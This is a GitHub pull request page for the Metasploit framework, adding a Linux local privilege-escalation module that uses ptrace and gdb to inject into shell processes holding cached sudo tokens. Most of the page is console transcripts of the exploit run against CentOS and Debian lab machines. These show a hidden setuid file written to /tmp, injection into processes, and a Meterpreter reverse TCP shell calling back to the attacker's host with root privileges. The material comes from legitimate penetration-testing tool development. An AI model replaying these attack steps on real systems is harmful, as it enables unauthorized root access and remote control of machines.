Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ptrace Sudo Token Privilege Escalation module #11799

Merged
merged 3 commits into from Sep 2, 2019

Conversation

@bcoles
Copy link
Contributor

commented Apr 30, 2019

Add ptrace Sudo Token Privilege Escalation module.

This module attempts to gain root privileges by blindly injecting into
the session user's running shell processes and executing commands by
calling `system()`, in the hope that the process has valid cached sudo
tokens with root privileges.

The system must have gdb installed and permit ptrace.

Scenarios

CentOS 7.4.1708 (x64)

msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] YAMA ptrace scope is not restrictive
[+] SELinux deny_ptrace is disabled
[+] sudo is installed
[+] gdb is installed
[*] Searching for shell processes ...
[*] Found 3 running shell processes
[*] 2343, 2483, 2958
[*] Writing '/tmp/.ka44kFCm8XyMEZ' (329 bytes) ...
[*] Injecting into process 2343 ...
[*] Injecting into process 2483 ...
[*] Injecting into process 2958 ...
[+] /tmp/.ka44kFCm8XyMEZ setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.141
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.141:53462) at 2019-08-10 02:49:48 -0400
[-] Failed to delete /tmp/.ka44kFCm8XyMEZ: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : centos-7-1708.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Debian 9.8 (x64)

msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] YAMA ptrace scope is not restrictive
[+] sudo is installed
[+] gdb is installed
[*] Searching for shell processes ...
[*] Found 5 running shell processes
[*] 661, 891, 23499, 23518, 23541
[*] Writing '/tmp/.Dpq90j6vOk' (329 bytes) ...
[*] Injecting into process 661 ...
[*] Injecting into process 891 ...
[*] Injecting into process 23499 ...
[*] Injecting into process 23518 ...
[+] /tmp/.Dpq90j6vOk setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.232
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.232:50744) at 2019-08-10 02:54:34 -0400
[-] Failed to delete /tmp/.Dpq90j6vOk: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : debian-9-8-x64.local
OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 30, 2019

Feel free to use draft mode for future PRs. It'll help signal to us better - and prevent an accidental merge.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented Apr 30, 2019

Feel free to use draft mode for future PRs. It'll help signal to us better.

I didn't see an option for draft mode when creating the PR.

I do not see an option for draft mode now, either.

A well designed user experience would permit putting a PR into draft mode after creation.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 30, 2019

I agree. It's really not a great interface. I'm adding a note about it to CONTRIBUTING.md.

@bcoles bcoles added docs and removed delayed labels Aug 10, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented Aug 31, 2019

Bump. This should be a fairly easy merge.

This module is useful for every Linux system with ptrace enabled (Debian and CentOS by default), and will continue to be useful until such time as ptrace is disabled by default, or the way sudo token caching works. Although this implementation requires gdb to be installed, which is less likely.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Aug 31, 2019

Non-committal, I'll see if I can knock this out in the next few days

@h00die

This comment has been minimized.

Copy link
Contributor

commented Sep 2, 2019

Centos 7 worked for me:

msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] YAMA ptrace scope is not restrictive
[+] SELinux deny_ptrace is disabled
[+] sudo is installed
[+] gdb is installed
[*] Searching for shell processes ...
[*] Found 2 running shell processes
[*] 1049, 1070
[*] Writing '/tmp/.SA8TUHbjwrM7LJ' (277 bytes) ...
[*] Max line length is 65537
[*] Writing 277 bytes in 1 chunks of 886 bytes (octal-encoded), using printf
[*] Injecting into process 1049 ...
[*] Injecting into process 1070 ...
[+] /tmp/.SA8TUHbjwrM7LJ setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 222.222.2.222

[*] Meterpreter session 3 opened (111.111.1.111:4444 -> 222.222.2.222:47982) at 2019-09-02 10:54:59 -0400

meterpreter > sysinfo
Computer     : centos71.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.21.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
h00die added a commit that referenced this pull request Sep 2, 2019

@h00die h00die merged commit 47cfcba into rapid7:master Sep 2, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

@h00die h00die self-assigned this Sep 2, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

commented Sep 2, 2019

Worked for me and looks good!

@h00die

This comment has been minimized.

Copy link
Contributor

commented Sep 2, 2019

Release Notes

This PR adds a linux local exploit against cached sudo tokens by injecting into a user's processes.

@bcoles bcoles deleted the bcoles:ptrace_sudo_token_priv_esc branch Sep 2, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.